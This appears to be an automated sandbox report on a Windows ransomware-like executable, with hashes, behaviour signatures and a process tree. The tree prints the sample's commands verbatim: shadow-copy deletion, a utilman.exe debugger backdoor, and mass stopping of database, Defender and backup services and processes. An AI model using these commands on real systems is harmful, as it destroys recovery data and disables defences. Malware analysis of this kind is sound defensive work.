Analysis

  • max time kernel
    108s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 22:01

General

  • Target

    226d0d0583eea980cafc0f40e447cb7cca92181c2bd7d4097f6eecfcfe811735.exe

  • Size

    2.4MB

  • MD5

    115f654337a669065eb7a16c033c9a8a

  • SHA1

    41e08af362e9622d9e433c728b883fbc59cb4845

  • SHA256

    226d0d0583eea980cafc0f40e447cb7cca92181c2bd7d4097f6eecfcfe811735

  • SHA512

    de3a8dc1bd62426f5948b81174f3d46dbca96ce71690a38cd532f919a958244f2f5d0716cfe2d954d1bb474bf00ddeab19888368532964729c43cfe7f36bb55f

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Sets file execution options in registry 2 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 41 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\226d0d0583eea980cafc0f40e447cb7cca92181c2bd7d4097f6eecfcfe811735.exe
    "C:\Users\Admin\AppData\Local\Temp\226d0d0583eea980cafc0f40e447cb7cca92181c2bd7d4097f6eecfcfe811735.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoExit -Command -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\SysWOW64\net.exe
        "C:\Windows\system32\net.exe" view
        3⤵
        • Discovers systems in the same network
        PID:2584
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoExit -Command -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3808
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
        3⤵
          PID:3084
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
          3⤵
            PID:1996
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1664
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
            3⤵
              PID:212
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
              3⤵
                PID:2676
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
                3⤵
                  PID:1780
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
                  3⤵
                    PID:1900
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
                    3⤵
                      PID:2840
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
                      3⤵
                        PID:5048
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
                        3⤵
                          PID:4748
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
                          3⤵
                            PID:4832
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
                            3⤵
                              PID:1824
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
                              3⤵
                                PID:3220
                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
                                3⤵
                                  PID:1088
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
                                  3⤵
                                    PID:4944
                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
                                    3⤵
                                      PID:2868
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
                                      3⤵
                                        PID:3044
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
                                        3⤵
                                          PID:640
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
                                          3⤵
                                            PID:1460
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
                                            3⤵
                                              PID:3472
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
                                              3⤵
                                                PID:4936
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
                                                3⤵
                                                  PID:4268
                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
                                                  3⤵
                                                    PID:1836
                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
                                                    3⤵
                                                      PID:4236
                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
                                                      3⤵
                                                        PID:2724
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
                                                        3⤵
                                                          PID:2616
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
                                                          3⤵
                                                            PID:1848
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
                                                            3⤵
                                                              PID:524
                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
                                                              3⤵
                                                                PID:4532
                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
                                                                3⤵
                                                                  PID:3708
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
                                                                  3⤵
                                                                    PID:2168
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
                                                                    3⤵
                                                                      PID:3864
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
                                                                      3⤵
                                                                        PID:2500
                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
                                                                        3⤵
                                                                          PID:3960
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
                                                                          3⤵
                                                                            PID:1228
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
                                                                            3⤵
                                                                              PID:2208
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
                                                                              3⤵
                                                                                PID:4740
                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
                                                                                3⤵
                                                                                  PID:4612
                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
                                                                                  3⤵
                                                                                    PID:848
                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
                                                                                    3⤵
                                                                                      PID:4052
                                                                                • C:\Windows\system32\vssvc.exe
                                                                                  C:\Windows\system32\vssvc.exe
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:848

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v6

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  938ffc2cba917b243d86b2cf76dcefb4

                                                                                  SHA1

                                                                                  234b53d91d075f16cc63c731eefdae278e2faad3

                                                                                  SHA256

                                                                                  5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

                                                                                  SHA512

                                                                                  e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                  Filesize

                                                                                  19KB

                                                                                  MD5

                                                                                  dcddaad9bd12a8ad11f5ecb5537e026a

                                                                                  SHA1

                                                                                  e1873762df75d933399345301df9604fce714c5e

                                                                                  SHA256

                                                                                  bc1624ed8d6e3b87776eaf5db1c99dea5a4308eda5f4f36f3ad111e02baf7c7c

                                                                                  SHA512

                                                                                  778b2af4c6b3c5a33927a0edaaf2c5adfa09b055321f782b30f115f1d6523eb4bdc31d86745fb81f18fc57b6ffde37ec90d0a3237fae734e8bc6602435713fce

                                                                                • memory/212-157-0x0000000000000000-mapping.dmp

                                                                                • memory/524-181-0x0000000000000000-mapping.dmp

                                                                                • memory/640-171-0x0000000000000000-mapping.dmp

                                                                                • memory/848-192-0x0000000000000000-mapping.dmp

                                                                                • memory/1088-167-0x0000000000000000-mapping.dmp

                                                                                • memory/1228-188-0x0000000000000000-mapping.dmp

                                                                                • memory/1460-172-0x0000000000000000-mapping.dmp

                                                                                • memory/1664-156-0x0000000000000000-mapping.dmp

                                                                                • memory/1780-159-0x0000000000000000-mapping.dmp

                                                                                • memory/1824-165-0x0000000000000000-mapping.dmp

                                                                                • memory/1836-176-0x0000000000000000-mapping.dmp

                                                                                • memory/1848-180-0x0000000000000000-mapping.dmp

                                                                                • memory/1900-160-0x0000000000000000-mapping.dmp

                                                                                • memory/1996-155-0x0000000000000000-mapping.dmp

                                                                                • memory/2168-184-0x0000000000000000-mapping.dmp

                                                                                • memory/2208-189-0x0000000000000000-mapping.dmp

                                                                                • memory/2316-148-0x0000000006F90000-0x0000000006FAE000-memory.dmp

                                                                                  Filesize

                                                                                  120KB

                                                                                • memory/2316-149-0x00000000070E0000-0x00000000070EA000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/2316-150-0x00000000071D0000-0x0000000007266000-memory.dmp

                                                                                  Filesize

                                                                                  600KB

                                                                                • memory/2316-151-0x0000000007150000-0x000000000715E000-memory.dmp

                                                                                  Filesize

                                                                                  56KB

                                                                                • memory/2316-152-0x00000000071A0000-0x00000000071BA000-memory.dmp

                                                                                  Filesize

                                                                                  104KB

                                                                                • memory/2316-153-0x0000000007190000-0x0000000007198000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2316-142-0x0000000000000000-mapping.dmp

                                                                                • memory/2316-147-0x0000000071020000-0x000000007106C000-memory.dmp

                                                                                  Filesize

                                                                                  304KB

                                                                                • memory/2316-146-0x0000000006FB0000-0x0000000006FE2000-memory.dmp

                                                                                  Filesize

                                                                                  200KB

                                                                                • memory/2500-186-0x0000000000000000-mapping.dmp

                                                                                • memory/2584-141-0x0000000000000000-mapping.dmp

                                                                                • memory/2616-179-0x0000000000000000-mapping.dmp

                                                                                • memory/2676-158-0x0000000000000000-mapping.dmp

                                                                                • memory/2724-178-0x0000000000000000-mapping.dmp

                                                                                • memory/2816-134-0x0000000004EC0000-0x0000000004F26000-memory.dmp

                                                                                  Filesize

                                                                                  408KB

                                                                                • memory/2816-138-0x00000000070E0000-0x0000000007156000-memory.dmp

                                                                                  Filesize

                                                                                  472KB

                                                                                • memory/2816-139-0x00000000077E0000-0x0000000007E5A000-memory.dmp

                                                                                  Filesize

                                                                                  6.5MB

                                                                                • memory/2816-131-0x0000000002840000-0x0000000002876000-memory.dmp

                                                                                  Filesize

                                                                                  216KB

                                                                                • memory/2816-132-0x0000000004FE0000-0x0000000005608000-memory.dmp

                                                                                  Filesize

                                                                                  6.2MB

                                                                                • memory/2816-130-0x0000000000000000-mapping.dmp

                                                                                • memory/2816-133-0x0000000004E20000-0x0000000004E42000-memory.dmp

                                                                                  Filesize

                                                                                  136KB

                                                                                • memory/2816-135-0x0000000005610000-0x0000000005676000-memory.dmp

                                                                                  Filesize

                                                                                  408KB

                                                                                • memory/2816-140-0x0000000007180000-0x000000000719A000-memory.dmp

                                                                                  Filesize

                                                                                  104KB

                                                                                • memory/2816-136-0x0000000005E00000-0x0000000005E1E000-memory.dmp

                                                                                  Filesize

                                                                                  120KB

                                                                                • memory/2816-137-0x0000000006390000-0x00000000063D4000-memory.dmp

                                                                                  Filesize

                                                                                  272KB

                                                                                • memory/2840-161-0x0000000000000000-mapping.dmp

                                                                                • memory/2868-169-0x0000000000000000-mapping.dmp

                                                                                • memory/3044-170-0x0000000000000000-mapping.dmp

                                                                                • memory/3084-154-0x0000000000000000-mapping.dmp

                                                                                • memory/3220-166-0x0000000000000000-mapping.dmp

                                                                                • memory/3472-173-0x0000000000000000-mapping.dmp

                                                                                • memory/3708-183-0x0000000000000000-mapping.dmp

                                                                                • memory/3808-145-0x0000000000000000-mapping.dmp

                                                                                • memory/3864-185-0x0000000000000000-mapping.dmp

                                                                                • memory/3960-187-0x0000000000000000-mapping.dmp

                                                                                • memory/4052-193-0x0000000000000000-mapping.dmp

                                                                                • memory/4236-177-0x0000000000000000-mapping.dmp

                                                                                • memory/4268-175-0x0000000000000000-mapping.dmp

                                                                                • memory/4532-182-0x0000000000000000-mapping.dmp

                                                                                • memory/4612-191-0x0000000000000000-mapping.dmp

                                                                                • memory/4740-190-0x0000000000000000-mapping.dmp

                                                                                • memory/4748-163-0x0000000000000000-mapping.dmp

                                                                                • memory/4832-164-0x0000000000000000-mapping.dmp

                                                                                • memory/4936-174-0x0000000000000000-mapping.dmp

                                                                                • memory/4944-168-0x0000000000000000-mapping.dmp

                                                                                • memory/5048-162-0x0000000000000000-mapping.dmp